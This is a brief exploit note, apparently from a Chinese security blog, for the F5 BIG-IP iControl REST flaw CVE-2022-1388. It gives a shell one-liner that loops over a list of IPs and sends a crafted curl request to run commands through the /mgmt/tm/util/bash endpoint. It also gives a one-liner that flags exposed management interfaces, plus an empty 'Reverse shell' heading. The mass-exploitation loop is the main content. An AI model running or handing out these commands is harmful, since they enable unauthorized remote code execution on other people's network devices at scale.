F5 BIG-IP(CVE-2022-1388) RCE
Detection
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
cat ips.txt | while read -r host; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf '%s \033[1;41mF5 iControl REST API Exposed\033[0m\n' "$host"; done
Reverse shell
Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/4810.html